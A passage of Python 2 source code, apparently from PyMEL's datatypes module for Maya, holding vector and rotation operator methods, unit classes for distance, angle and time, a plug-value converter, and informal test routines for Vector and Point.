from v if v is convertible to a VectorN (element-wise substration),\n replace every component c of u by v-c if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__rsub__(self, other))\n except:\n return self.__class__._convert(super(EulerRotation, self).__rsub__(other))\n\n def __isub__(self, other):\n \"\"\" u.__isub__(v) <==> u -= v\n In place substraction of u and v, see __sub__ \"\"\"\n try:\n return self.__class__(self.__sub__(other))\n except:\n return NotImplemented\n\n def __div__(self, other):\n \"\"\" u.__div__(v) <==> u/v\n Returns the result of the division of u by v if v is convertible to a VectorN (element-wise division),\n divide every component of u by v if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__div__(self, other))\n except:\n return self.__class__._convert(super(EulerRotation, self).__div__(other))\n\n def __rdiv__(self, other):\n \"\"\" u.__rdiv__(v) <==> v/u\n Returns the result of of the division of v by u if v is convertible to a VectorN (element-wise division),\n invert every component of u and multiply it by v if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__rdiv__(self, other))\n except:\n return self.__class__._convert(super(EulerRotation, self).__rdiv__(other))\n\n def __idiv__(self, other):\n \"\"\" u.__idiv__(v) <==> u /= v\n In place division of u by v, see __div__ \"\"\"\n try:\n return self.__class__(self.__div__(other))\n except:\n return NotImplemented\n # action depends on second object type\n\n def __mul__(self, other):\n \"\"\" u.__mul__(v) <==> u*v\n The multiply '*' operator is mapped to the dot product when both objects are Vectors,\n to the transformation of u by matrix v when v is a MatrixN,\n to element wise multiplication when v is a sequence,\n and multiplies each component of u by v when v is a numeric type. \"\"\"\n try:\n res = self.apicls.__mul__(self, other)\n except:\n res = super(EulerRotation, self).__mul__(other)\n if util.isNumeric(res):\n return res\n else:\n return self.__class__._convert(res)\n\n def __rmul__(self, other):\n \"\"\" u.__rmul__(v) <==> v*u\n The multiply '*' operator is mapped to the dot product when both objects are Vectors,\n to the left side multiplication (pre-multiplication) of u by matrix v when v is a MatrixN,\n to element wise multiplication when v is a sequence,\n and multiplies each component of u by v when v is a numeric type. \"\"\"\n try:\n res = self.apicls.__rmul__(self, other)\n except:\n res = super(EulerRotation, self).__rmul__(other)\n if util.isNumeric(res):\n return res\n else:\n return self.__class__._convert(res)\n\n def __imul__(self, other):\n \"\"\" u.__imul__(v) <==> u *= v\n Valid for EulerRotation * Matrix multiplication, in place transformation of u by Matrix v\n or EulerRotation by scalar multiplication only \"\"\"\n try:\n return self.__class__(self.__mul__(other))\n except:\n return NotImplemented\n # special operators\n# def __xor__(self, other):\n# \"\"\" u.__xor__(v) <==> u^v\n# Defines the cross product operator between two 3D vectors,\n# if v is a MatrixN, u^v is equivalent to u.transformAsNormal(v) \"\"\"\n# if isinstance(other, VectorN) :\n# return self.cross(other)\n# elif isinstance(other, MatrixN) :\n# return self.transformAsNormal(other)\n# else :\n# return NotImplemented\n# def __ixor__(self, other):\n# \"\"\" u.__xor__(v) <==> u^=v\n# Inplace cross product or transformation by inverse transpose of v is v is a MatrixN \"\"\"\n# try :\n# return self.__class__(self.__xor__(other))\n# except :\n# return NotImplemented\n\n\n\n\nclass Unit(float):\n __slots__ = ['unit', 'data', '_unit']\n\n # TODO: implement proper equality comparison - currently,\n # Distance(5, 'meters') == Distance(5, 'centimeters')\n\n @classmethod\n def getUIUnit(cls):\n \"\"\"\n Returns the global UI units currently in use for that type\n \"\"\"\n return cls.sUnit(cls.apicls.uiUnit())\n\n @classmethod\n def setUIUnit(cls, unit=None):\n \"\"\"\n Sets the global UI units currently to use for that type\n \"\"\"\n if unit is None:\n cls.apicls.setUIUnit(cls.apicls.internalUnit())\n else:\n cls.apicls.setUIUnit(cls.kUnit(unit))\n\n @classmethod\n def getInternalUnit(cls):\n \"\"\"\n Returns the internal units currently in use for that type\n \"\"\"\n return cls.sUnit(cls.apicls.internalUnit())\n\n @classmethod\n def uiToInternal(cls, value):\n d = cls(value, cls.getUIUnit())\n return d.asInternalUnit()\n\n @classmethod\n def kUnit(cls, unit=None):\n \"\"\"\n Converts a string unit name to the internal int unit enum representation\n \"\"\"\n if unit:\n return cls.Unit.getIndex(unit)\n else:\n return cls.apicls.uiUnit()\n\n @classmethod\n def sUnit(cls, unit=None):\n \"\"\"\n Converts an internal int unit enum representation to the string unit name\n \"\"\"\n if unit:\n return cls.Unit.getKey(unit)\n else:\n return str(cls.unit[cls.apicls.uiUnit()])\n\n def getUnit(self):\n \"\"\"\n Returns the units currently in effect for this instance\n \"\"\"\n return self.__class__.sUnit(self._unit)\n# def setUnit(self, unit=None) :\n# \"\"\"\n# Sets the units currently in effect for this instance\n# \"\"\"\n# self._unit = self.__class__.kUnit(unit)\n unit = property(getUnit, None, None, \"The units currently in effect for this instance\")\n\n def __new__(cls, value, unit=None):\n unit = cls.kUnit(unit)\n if isinstance(value, cls.apicls):\n value = value.asUnits(unit)\n elif isinstance(value, cls):\n value = value.asUnit(unit)\n #data = cls.apicls(value, unit)\n # the float representation uses internal units so that arithmetics work\n #newobj = float.__new__(cls, data.asUnit(cls.apicls.internalUnit()))\n #newobj = float.__new__(cls, data.asUnit(unit))\n newobj = float.__new__(cls, value)\n #ewobj._data = data\n newobj._unit = unit\n newobj._data = cls.apicls(value, unit)\n return newobj\n\n def assign(self, *args):\n if isinstance(args, self.__class__):\n args = (args._data, args._unit)\n self._data.assign(*args)\n\n def __repr__(self):\n return 'dt.%s(%s, unit=%r)' % (self.__class__.__name__, self, self.unit)\n\n def asUnit(self, unit):\n return self._data.asUnits(self.__class__.kUnit(unit))\n\n# def asUnit(self) :\n# return self.asUnit(self.unit)\n\n def asUIUnit(self):\n return self.asUnit(self.__class__.getUIUnit())\n\n def asInternalUnit(self):\n return self.asUnit(self.__class__.getInternalUnit())\n\nclass Time(Unit):\n apicls = _api.MTime\n Unit = _factories.apiClassInfo['MTime']['pymelEnums']['Unit']\n\n @classmethod\n def _inCast(cls, x):\n return cls(x)._data\n\n\nclass Distance(Unit):\n\n \"\"\"\n >>> from pymel.core import *\n >>> import pymel.core.datatypes as dt\n >>>\n >>> dt.Distance.getInternalUnit()\n 'centimeters'\n >>> dt.Distance.setUIUnit('meters')\n >>> dt.Distance.getUIUnit()\n 'meters'\n\n >>> d = dt.Distance(12)\n >>> d.unit\n 'meters'\n >>> print d\n 12.0\n >>> print repr(d)\n dt.Distance(12.0, unit='meters')\n >>> print d.asUIUnit()\n 12.0\n >>> print d.asInternalUnit()\n 1200.0\n\n >>> dt.Distance.setUIUnit('centimeters')\n >>> dt.Distance.getUIUnit()\n 'centimeters'\n >>> e = dt.Distance(12)\n >>> e.unit\n 'centimeters'\n >>> print e\n 12.0\n >>> str(e)\n '12.0'\n >>> print repr(e)\n dt.Distance(12.0, unit='centimeters')\n >>> print e.asUIUnit()\n 12.0\n >>> print e.asInternalUnit()\n 12.0\n\n >>> f = dt.Distance(12, 'feet')\n >>> print f\n 12.0\n >>> print repr(f)\n dt.Distance(12.0, unit='feet')\n >>> f.unit\n 'feet'\n >>> print f.asUIUnit()\n 365.76\n >>> dt.Distance.setUIUnit('meters')\n >>> dt.Distance.getUIUnit()\n 'meters'\n >>> print f.asUIUnit()\n 3.6576\n >>> dt.Distance.getInternalUnit()\n 'centimeters'\n >>> print f.asInternalUnit()\n 365.76\n\n >>> print f.asFeet()\n 12.0\n >>> print f.asMeters()\n 3.6576\n >>> print f.asCentimeters()\n 365.76\n\n >>> dt.Distance.setUIUnit()\n >>> dt.Distance.getUIUnit()\n 'centimeters'\n \"\"\"\n apicls = _api.MDistance\n Unit = _factories.apiClassInfo['MDistance']['pymelEnums']['Unit']\n\n def asMillimeter(self):\n return self.asUnit('millimeter')\n\n def asCentimeters(self):\n return self.asUnit('centimeters')\n\n def asKilometers(self):\n return self.asUnit('kilometers')\n\n def asMeters(self):\n return self.asUnit('meters')\n\n def asInches(self):\n return self.asUnit('inches')\n\n def asFeet(self):\n return self.asUnit('feet')\n\n def asYards(self):\n return self.asUnit('yards')\n\n def asMiles(self):\n return self.asUnit('miles')\n\n @classmethod\n def _outCast(cls, instance, result):\n return cls(result, 'centimeters').asUIUnit()\n\n\nclass Angle(Unit):\n apicls = _api.MAngle\n Unit = _factories.apiClassInfo['MAngle']['pymelEnums']['Unit']\n\n def asRadians(self):\n return self.asUnit('radians')\n\n def asDegrees(self):\n return self.asUnit('degrees')\n\n def asAngMinutes(self):\n return self.asUnit('angMinutes')\n\n def asAngSeconds(self):\n return self.asUnit('angSeconds')\n\n @classmethod\n def _outCast(cls, instance, result):\n return cls(result, 'radians').asUIUnit()\n\n\nclass BoundingBox(_api.MBoundingBox):\n apicls = _api.MBoundingBox\n __metaclass__ = _factories.MetaMayaTypeWrapper\n\n def __init__(self, *args):\n if len(args) == 2:\n args = list(args)\n if not isinstance(args[0], _api.MPoint):\n args[0] = Point(args[0])\n if not isinstance(args[1], _api.MPoint):\n args[1] = Point(args[1])\n _api.MBoundingBox.__init__(self, *args)\n\n def __str__(self):\n return 'dt.%s(%s,%s)' % (self.__class__.__name__, self.min(), self.max())\n\n def __repr__(self):\n return str(self)\n\n def __getitem__(self, item):\n if item == 0:\n return self.min()\n elif item == 1:\n return self.max()\n raise IndexError, \"Index out of range\"\n\n def __melobject__(self):\n \"\"\"A flat list of 6 values [minx, miny, minz, maxx, maxy, maxz]\"\"\"\n return list(self.min()) + list(self.max())\n\n repr = __str__\n w = property(_factories.wrapApiMethod(_api.MBoundingBox, 'width'))\n h = property(_factories.wrapApiMethod(_api.MBoundingBox, 'height'))\n d = property(_factories.wrapApiMethod(_api.MBoundingBox, 'depth'))\n\n#_factories.ApiTypeRegister.register( 'MVector', Vector )\n#_factories.ApiTypeRegister.register( 'MMatrix', Matrix )\n#_factories.ApiTypeRegister.register( 'MPoint', Point )\n#_factories.ApiTypeRegister.register( 'MColor', Color )\n#_factories.ApiTypeRegister.register( 'MQuaternion', Quaternion )\n#_factories.ApiTypeRegister.register( 'MEulerRotation', EulerRotation )\n_factories.ApiTypeRegister.register('MTime', Time, inCast=Time._inCast)\n_factories.ApiTypeRegister.register('MDistance', Distance, outCast=Distance._outCast)\n_factories.ApiTypeRegister.register('MAngle', Angle, outCast=Angle._outCast)\n\n\n#_floatUpConvertDict = {_api.MFloatArray:_api.MDoubleArray,\n# _api.MFloatMatrix:_api.MMatrix,\n# _api.MFloatPoint:_api.MPoint,\n# _api.MFloatPointArray:_api.MPointArray,\n# _api.MFloatVector:_api.MVector,\n# _api.MFloatVectorArray:_api.MVectorArray,\n# FloatMatrix:Matrix,\n# FloatPoint:Point,\n# FloatVector:Vector\n# }\n# def _floatUpConvert(input):\n# \"\"\"Will convert various Float* objects to their corresponding double object\n#\n# ie, api.MFloatMatrix => api.MMatrix, FloatPoint => Point\n# \"\"\"\n# newClass = _floatUpConvertDict.get(input.__class__)\n# if newClass:\n# return newClass(input)\n# else:\n# return input\n\ndef getPlugValue(plug):\n \"\"\"given an MPlug, get its value as a pymel-style object\"\"\"\n\n # if plug.isArray():\n # raise TypeError, \"array plugs of this type are not supported\"\n\n obj = plug.attribute()\n apiType = obj.apiType()\n\n # Float Pairs\n if apiType in [_api.MFn.kAttribute2Double, _api.MFn.kAttribute2Float]:\n res = []\n for i in range(plug.numChildren()):\n res.append(getPlugValue(plug.child(i)))\n if isinstance(res[0], Distance):\n return Vector(res)\n return res\n\n # Integer Groups\n elif apiType in [_api.MFn.kAttribute2Short, _api.MFn.kAttribute2Int, _api.MFn.kAttribute3Short, _api.MFn.kAttribute3Int]:\n res = []\n for i in range(plug.numChildren()):\n res.append(getPlugValue(plug.child(i)))\n return res\n\n # Float Groups\n elif apiType in [_api.MFn.kAttribute3Double, _api.MFn.kAttribute3Float, _api.MFn.kAttribute4Double]:\n res = []\n for i in range(plug.numChildren()):\n res.append(getPlugValue(plug.child(i)))\n\n if isinstance(res[0], Distance):\n return Vector(res)\n elif _api.MFnAttribute(obj).isUsedAsColor():\n return Color(res)\n return res\n\n # Compound\n elif apiType in [_api.MFn.kCompoundAttribute]:\n res = []\n for i in range(plug.numChildren()):\n res.append(getPlugValue(plug.child(i)))\n return tuple(res)\n\n # Distance\n elif apiType in [_api.MFn.kDoubleLinearAttribute, _api.MFn.kFloatLinearAttribute]:\n val = plug.asMDistance()\n unit = _api.MDistance.uiUnit()\n # as becomes a keyword in python 2.6\n return Distance(val.asUnits(unit), unit)\n\n # Angle\n elif apiType in [_api.MFn.kDoubleAngleAttribute, _api.MFn.kFloatAngleAttribute]:\n val = plug.asMAngle()\n unit = _api.MAngle.uiUnit()\n # as becomes a keyword in python 2.6\n return Angle(val.asUnits(unit), unit)\n\n # Time\n elif apiType == _api.MFn.kTimeAttribute:\n val = plug.asMTime()\n unit = _api.MTime.uiUnit()\n # as becomes a keyword in python 2.6\n return Time(val.asUnits(unit), unit)\n\n elif apiType == _api.MFn.kNumericAttribute:\n nAttr = _api.MFnNumericAttribute(obj)\n dataType = nAttr.unitType()\n if dataType == _api.MFnNumericData.kBoolean:\n return plug.asBool()\n\n elif dataType in [_api.MFnNumericData.kShort, _api.MFnNumericData.kInt, _api.MFnNumericData.kLong, _api.MFnNumericData.kByte]:\n return plug.asInt()\n\n elif dataType in [_api.MFnNumericData.kFloat, _api.MFnNumericData.kDouble, _api.MFnNumericData.kAddr]:\n return plug.asDouble()\n raise \"%s: unknown numeric attribute type: %s\" % (plug.partialName(True, True, True, False, True, True), dataType)\n\n elif apiType == _api.MFn.kEnumAttribute:\n # TODO : use EnumValue class?\n return plug.asInt()\n\n elif apiType == _api.MFn.kTypedAttribute:\n tAttr = _api.MFnTypedAttribute(obj)\n dataType = tAttr.attrType()\n\n if dataType == _api.MFnData.kInvalid: # 0\n return None\n\n elif dataType == _api.MFnData.kNumeric: # 1\n\n # all of the dynamic mental ray attributes fail here, but i have no idea why they are numeric attrs and not message attrs.\n # cmds.getAttr returns None, so we will too.\n try:\n dataObj = plug.asMObject()\n except:\n return\n\n try:\n numFn = _api.MFnNumericData(dataObj)\n except RuntimeError:\n if plug.isArray():\n raise TypeError, \"%s: numeric arrays are not supported\" % plug.partialName(True, True, True, False, True, True)\n else:\n raise TypeError, \"%s: attribute type is numeric, but its data cannot be interpreted numerically\" % plug.partialName(True, True, True, False, True, True)\n dataType = numFn.numericType()\n\n if dataType == _api.MFnNumericData.kBoolean:\n return plug.asBool()\n\n elif dataType in [_api.MFnNumericData.kShort, _api.MFnNumericData.kInt, _api.MFnNumericData.kLong, _api.MFnNumericData.kByte]:\n return plug.asInt()\n\n elif dataType in [_api.MFnNumericData.kFloat, _api.MFnNumericData.kDouble, _api.MFnNumericData.kAddr]:\n return plug.asDouble()\n\n elif dataType == _api.MFnNumericData.k2Short:\n ptr1 = _api.SafeApiPtr('short')\n ptr2 = _api.SafeApiPtr('short')\n\n numFn.getData2Short(ptr1(), ptr2())\n return (ptr1.get(), ptr2.get())\n\n elif dataType in [_api.MFnNumericData.k2Int, _api.MFnNumericData.k2Long]:\n ptr1 = _api.SafeApiPtr('int')\n ptr2 = _api.SafeApiPtr('int')\n\n numFn.getData2Int(ptr1(), ptr2())\n return (ptr1.get(), ptr2.get())\n\n elif dataType == _api.MFnNumericData.k2Float:\n ptr1 = _api.SafeApiPtr('float')\n ptr2 = _api.SafeApiPtr('float')\n\n numFn.getData2Float(ptr1(), ptr2())\n return (ptr1.get(), ptr2.get())\n\n elif dataType == _api.MFnNumericData.k2Double:\n ptr1 = _api.SafeApiPtr('double')\n ptr2 = _api.SafeApiPtr('double')\n\n numFn.getData2Double(ptr1(), ptr2())\n return (ptr1.get(), ptr2.get())\n\n elif dataType == _api.MFnNumericData.k3Float:\n ptr1 = _api.SafeApiPtr('float')\n ptr2 = _api.SafeApiPtr('float')\n ptr3 = _api.SafeApiPtr('float')\n\n numFn.getData3Float(ptr1(), ptr2(), ptr3())\n return (ptr1.get(), ptr2.get(), ptr3.get())\n\n elif dataType == _api.MFnNumericData.k3Double:\n ptr1 = _api.SafeApiPtr('double')\n ptr2 = _api.SafeApiPtr('double')\n ptr3 = _api.SafeApiPtr('double')\n\n numFn.getData3Double(ptr1(), ptr2(), ptr3())\n return (ptr1.get(), ptr2.get(), ptr3.get())\n\n elif dataType == _api.MFnNumericData.kChar:\n return plug.asChar()\n\n raise TypeError, \"%s: Unsupported numeric attribute: %s\" % (plug.partialName(True, True, True, False, True, True), dataType)\n\n elif dataType == _api.MFnData.kString: # 4\n return plug.asString()\n\n elif dataType == _api.MFnData.kMatrix: # 5\n return Matrix(_api.MFnMatrixData(plug.asMObject()).matrix())\n\n elif dataType == _api.MFnData.kStringArray: # 6\n try:\n dataObj = plug.asMObject()\n except RuntimeError:\n return []\n array = _api.MFnStringArrayData(dataObj).array()\n return [array[i] for i in range(array.length())]\n\n elif dataType == _api.MFnData.kDoubleArray: # 7\n try:\n dataObj = plug.asMObject()\n except RuntimeError:\n return []\n array = _api.MFnDoubleArrayData(dataObj).array()\n return [array[i] for i in range(array.length())]\n\n elif dataType == _api.MFnData.kIntArray: # 8\n try:\n dataObj = plug.asMObject()\n except RuntimeError:\n return []\n array = _api.MFnIntArrayData(dataObj).array()\n return [array[i] for i in range(array.length())]\n\n elif dataType == _api.MFnData.kPointArray: # 9\n try:\n dataObj = plug.asMObject()\n except RuntimeError:\n return []\n array = _api.MFnPointArrayData(dataObj).array()\n return [Point(array[i]) for i in range(array.length())]\n\n elif dataType == _api.MFnData.kVectorArray: # 10\n try:\n dataObj = plug.asMObject()\n except RuntimeError:\n return []\n array = _api.MFnVectorArrayData(dataObj).array()\n return [Vector(array[i]) for i in range(array.length())]\n\n # this block crashes maya under certain circumstances\n# elif dataType == _api.MFnData.kComponentList : # 11\n# try:\n# dataObj = plug.asMObject()\n# except RuntimeError:\n# return []\n# array = _api.MFnComponentListData( dataObj )\n# return array\n# #return [ Vector(array[i]) for i in range(array.length()) ]\n\n raise TypeError, \"%s: Unsupported typed attribute: %s\" % (plug.partialName(True, True, True, False, True, True), dataType)\n\n raise TypeError, \"%s: Unsupported Type: %s\" % (plug.partialName(True, True, True, False, True, True), _factories.apiEnumsToApiTypes.get(apiType, apiType))\n\ndef _testMVector():\n\n print \"Vector class:\", dir(Vector)\n u = Vector()\n print u\n print \"Vector instance:\", dir(u)\n print repr(u)\n print Vector.__readonly__\n print Vector.__slots__\n print Vector.shape\n print Vector.ndim\n print Vector.size\n print u.shape\n print u.ndim\n print u.size\n # should fail\n u.shape = 2\n\n u.assign(Vector(4, 5, 6))\n print repr(u)\n #Vector([4.0, 5.0, 6.0])\n u = Vector(1, 2, 3)\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n print len(u)\n # 3\n # inherits from VectorN --> Array\n print isinstance(u, VectorN)\n # True\n print isinstance(u, Array)\n # True\n # as well as _api.Vector\n print isinstance(u, _api.MVector)\n # True\n # accepted directly by API methods\n M = _api.MTransformationMatrix()\n M.setTranslation(u, _api.MSpace.kWorld)\n # need conversion on the way back though\n u = Vector(M.getTranslation(_api.MSpace.kWorld))\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n\n u = Vector(x=1, y=2, z=3)\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n u = Vector([1, 2], z=3)\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n u = Vector(_api.MPoint(1, 2, 3))\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n print \"u = Vector(VectorN(1, 2, 3))\"\n u = Vector(VectorN(1, 2, 3))\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n u = Vector(1)\n print repr(u)\n # Vector([1.0, 1.0, 1.0])\n u = Vector(1, 2)\n print repr(u)\n # Vector([1.0, 2.0, 0.0])\n u = Vector(VectorN(1, shape=(2,)))\n print repr(u)\n # Vector([1.0, 1.0, 0.0])\n u = Vector(Point(1, 2, 3))\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n u = Vector(Point(1, 2, 3, 1), y=20, z=30)\n print repr(u)\n # Vector([1.0, 20.0, 30.0])\n # should fail\n print \"Vector(VectorN(1, 2, 3, 4))\"\n try:\n u = Vector(VectorN(1, 2, 3, 4))\n except:\n print \"will raise ValueError: could not cast [1, 2, 3, 4] to Vector of size 3, some data would be lost\"\n\n print u.get()\n # (1.0, 20.0, 30.0)\n print u[0]\n 1.0\n u[0] = 10\n print repr(u)\n # Vector([10.0, 20.0, 30.0])\n print (10 in u)\n # True\n print list(u)\n # [10.0, 20.0, 30.0]\n\n u = Vector.xAxis\n v = Vector.yAxis\n print Vector.xAxis\n print str(Vector.xAxis)\n print unicode(Vector.xAxis)\n print repr(Vector.xAxis)\n\n print \"u = Vector.xAxis:\"\n print repr(u)\n # Vector([1.0, 0.0, 0.0])\n print \"v = Vector.yAxis:\"\n print repr(v)\n # Vector([0.0, 1.0, 0.0])\n n = u ^ v\n print \"n = u ^ v:\"\n print repr(n)\n # Vector([0.0, 0.0, 1.0])\n print \"n.x=%s, n.y=%s, n.z=%s\" % (n.x, n.y, n.z)\n # n.x=0.0, n.y=0.0, n.z=1.0\n n = u ^ VectorN(v)\n print \"n = u ^ VectorN(v):\"\n print repr(n)\n # Vector([0.0, 0.0, 1.0])\n n = u ^ [0, 1, 0]\n print \"n = u ^ [0, 1, 0]:\"\n print repr(n)\n # Vector([0.0, 0.0, 1.0])\n n[0:2] = [1, 1]\n print \"n[0:2] = [1, 1]:\"\n print repr(n)\n # Vector([1.0, 1.0, 1.0])\n print \"n = n * 2 :\"\n n = n * 2\n print repr(n)\n # Vector([2.0, 2.0, 2.0])\n print \"n = n * [0.5, 1.0, 2.0]:\"\n n = n * [0.5, 1.0, 2.0]\n print repr(n)\n # Vector([1.0, 2.0, 4.0])\n print \"n * n :\"\n print n * n\n # 21.0\n print repr(n.clamp(1.0, 2.0))\n # Vector([1.0, 2.0, 2.0])\n print repr(-n)\n # Vector([-1.0, -2.0, -4.0])\n w = u + v\n print repr(w)\n # Vector([1.0, 1.0, 0.0])\n p = Point(1, 2, 3)\n q = u + p\n print repr(q)\n # Point([2.0, 2.0, 3.0, 1.0])\n q = p + u\n print repr(q)\n # Point([2.0, 2.0, 3.0, 1.0])\n print repr(p + q)\n # Point([3.0, 4.0, 6.0, 1.0])\n w = u + VectorN(1, 2, 3, 4)\n print repr(w)\n # VectorN([2.0, 2.0, 3.0, 4])\n print repr(u + 2)\n # Vector([3.0, 2.0, 2.0])\n print repr(2 + u)\n # Vector([3.0, 2.0, 2.0])\n print repr(p + 2)\n # Point([3.0, 4.0, 5.0, 1.0])\n print repr(2 + p)\n # Point([3.0, 4.0, 5.0, 1.0])\n print repr(p + u)\n # Point([2.0, 2.0, 3.0, 1.0])\n print repr(VectorN(1, 2, 3, 4) + u)\n # VectorN([2.0, 2.0, 3.0, 4])\n print repr([1, 2, 3] + u)\n # Vector([2.0, 2.0, 3.0])\n\n u = Vector(1, 2, 3)\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n print u.length()\n # 3.74165738677\n print length(u)\n # 3.74165738677\n print length([1, 2, 3])\n # 3.74165738677\n print length(VectorN(1, 2, 3))\n # 3.74165738677\n print VectorN(1, 2, 3).length()\n # 3.74165738677\n print length(VectorN(1, 2, 3, 4))\n # 5.47722557505\n print VectorN(1, 2, 3, 4).length()\n # 5.47722557505\n print length(1)\n # 1.0\n print length([1, 2])\n # 2.2360679775\n print length([1, 2, 3])\n # 3.74165738677\n print length([1, 2, 3, 4])\n # 5.47722557505\n print length([1, 2, 3, 4], 0)\n # 5.47722557505\n print length([1, 2, 3, 4], (0,))\n # 5.47722557505\n print length([[1, 2], [3, 4]], 1)\n # [3.16227766017, 4.472135955]\n # should fail\n try:\n print length([1, 2, 3, 4], 1)\n except:\n print \"Will raise ValueError, \\\"axis 0 is the only valid axis for a Vector, 1 invalid\\\"\"\n\n u = Vector(1, 2, 3)\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n print u.sqlength()\n # 14\n print repr(u.normal())\n # Vector([0.267261241912, 0.534522483825, 0.801783725737])\n u.normalize()\n print repr(u)\n # Vector([0.267261241912, 0.534522483825, 0.801783725737])\n\n u = Vector(1, 2, 3)\n print repr(u)\n # Vector([1.0, 2.0, 3.0])\n w = u + [0.01, 0.01, 0.01]\n print repr(w)\n # Vector([1.01, 2.01, 3.01])\n print (u == u)\n # True\n print (u == w)\n # False\n print (u == Vector(1.0, 2.0, 3.0))\n # True\n print (u == [1.0, 2.0, 3.0])\n # False\n print (u == Point(1.0, 2.0, 3.0))\n # False\n print u.isEquivalent([1.0, 2.0, 3.0])\n # True\n print u.isEquivalent(Vector(1.0, 2.0, 3.0))\n # True\n print u.isEquivalent(Point(1.0, 2.0, 3.0))\n # True\n print u.isEquivalent(w)\n # False\n print u.isEquivalent(w, 0.1)\n # True\n\n u = Vector(1, 0, 0)\n print repr(u)\n # Vector([1.0, 0.0, 0.0])\n v = Vector(0.707, 0, -0.707)\n print repr(v)\n # Vector([0.707, 0.0, -0.707])\n print repr(axis(u, v))\n # Vector([-0.0, 0.707, 0.0])\n print repr(u.axis(v))\n # Vector([-0.0, 0.707, 0.0])\n print repr(axis(VectorN(u), VectorN(v)))\n # VectorN([-0.0, 0.707, 0.0])\n print repr(axis(u, v, normalize=True))\n # Vector([-0.0, 1.0, 0.0])\n print repr(v.axis(u, normalize=True))\n # Vector([-0.0, -1.0, 0.0])\n print repr(axis(VectorN(u), VectorN(v), normalize=True))\n # VectorN([-0.0, 1.0, 0.0])\n print angle(u, v)\n # 0.785398163397\n print v.angle(u)\n # 0.785398163397\n print angle(VectorN(u), VectorN(v))\n # 0.785398163397\n print cotan(u, v)\n # 1.0\n print repr(u.rotateTo(v))\n # Quaternion([-0.0, 0.382683432365, 0.0, 0.923879532511])\n print repr(u.rotateBy(u.axis(v), u.angle(v)))\n # Vector([0.707106781187, 0.0, -0.707106781187])\n q = Quaternion([-0.0, 0.382683432365, 0.0, 0.923879532511])\n print repr(u.rotateBy(q))\n # Vector([0.707106781187, 0.0, -0.707106781187])\n print u.distanceTo(v)\n # 0.765309087885\n print u.isParallel(v)\n # False\n print u.isParallel(2 * u)\n # True\n print repr(u.blend(v))\n # Vector([0.8535, 0.0, -0.3535])\n\n print \"end tests Vector\"\n\ndef _testMPoint():\n\n print \"Point class\", dir(Point)\n print hasattr(Point, 'data')\n p = Point()\n print repr(p)\n # Point([0.0, 0.0, 0.0])\n print \"Point instance\", dir(p)\n print hasattr(p, 'data')\n print repr(p.data)\n # >\n\n p = Point(1, 2, 3)\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n v = Vector(p)\n print repr(v)\n # Vector([1.0, 2.0, 3.0])\n V = VectorN(p)\n print repr(V)\n # VectorN([1.0, 2.0, 3.0, 1.0])\n print list(p)\n # [1.0, 2.0, 3.0]\n print len(p)\n # 3\n print p.size\n # 4\n print p.x, p.y, p.z, p.w\n # 1.0 2.0 3.0 1.0\n print p[0], p[1], p[2], p[3]\n # 1.0 2.0 3.0 1.0\n p.get()\n # 1.0 2.0 3.0 1.0\n\n # accepted by api\n q = _api.MPoint()\n print q.distanceTo(p)\n # 3.74165738677\n\n # support for non cartesian points still there\n\n p = Point(1, 2, 3, 2)\n print repr(p)\n # Point([1.0, 2.0, 3.0, 2.0])\n v = Vector(p)\n print repr(v)\n # Vector([0.5, 1.0, 1.5])\n V = VectorN(p)\n print repr(V)\n # VectorN([1.0, 2.0, 3.0, 2.0])\n print list(p)\n # [1.0, 2.0, 3.0, 2.0]\n print len(p)\n # 4\n print p.size\n # 4\n print p.x, p.y, p.z, p.w\n # 1.0 2.0 3.0 2.0\n print p[0], p[1], p[2], p[3]\n # 1.0 2.0 3.0 2.0\n p.get()\n # 1.0 2.0 3.0 2.0\n\n # accepted by api\n q = _api.MPoint()\n print q.distanceTo(p)\n # 1.87082869339\n\n p = Point(_api.MPoint())\n print repr(p)\n # Point([0.0, 0.0, 0.0])\n p = Point(1)\n print repr(p)\n # Point([1.0, 1.0, 1.0])\n p = Point(1, 2)\n print repr(p)\n # Point([1.0, 2.0, 0.0])\n p = Point(1, 2, 3)\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n p = Point(_api.MPoint(1, 2, 3))\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n p = Point(VectorN(1, 2))\n print repr(p)\n # Point([1.0, 2.0, 0.0])\n p = Point(Vector(1, 2, 3))\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n p = Point(_api.MVector(1, 2, 3))\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n p = Point(VectorN(1, 2, 3, 4))\n print repr(p)\n # Point([1.0, 2.0, 3.0, 4.0])\n print repr(Vector(p))\n # Vector([0.25, 0.5, 0.75])\n print repr(VectorN(p))\n # VectorN([1.0, 2.0, 3.0, 4.0])\n p = Point(p, w=1)\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n print repr(Vector(p))\n # Vector([1.0, 2.0, 3.0])\n print repr(VectorN(p))\n # VectorN([1.0, 2.0, 3.0, 1.0])\n\n p = Point.origin\n print repr(p)\n # Point([0.0, 0.0, 0.0])\n p = Point.xAxis\n print repr(p)\n # Point([1.0, 0.0, 0.0])\n\n p = Point(1, 2, 3)\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n print repr(p + Vector([1, 2, 3]))\n # Point([2.0, 4.0, 6.0])\n print repr(p + Point([1, 2, 3]))\n # Point([2.0, 4.0, 6.0])\n print repr(p + [1, 2, 3])\n # Point([2.0, 4.0, 6.0])\n print repr(p + [1, 2, 3, 1])\n # Point([2.0, 4.0, 6.0])\n print repr(p + Point([1, 2, 3, 1]))\n # Point([2.0, 4.0, 6.0])\n print repr(p + [1, 2, 3, 2])\n # Point([2.0, 4.0, 6.0, 3.0]) TODO : convert to Point always?\n print repr(p + Point([1, 2, 3, 2]))\n # Point([1.5, 3.0, 4.5])\n\n 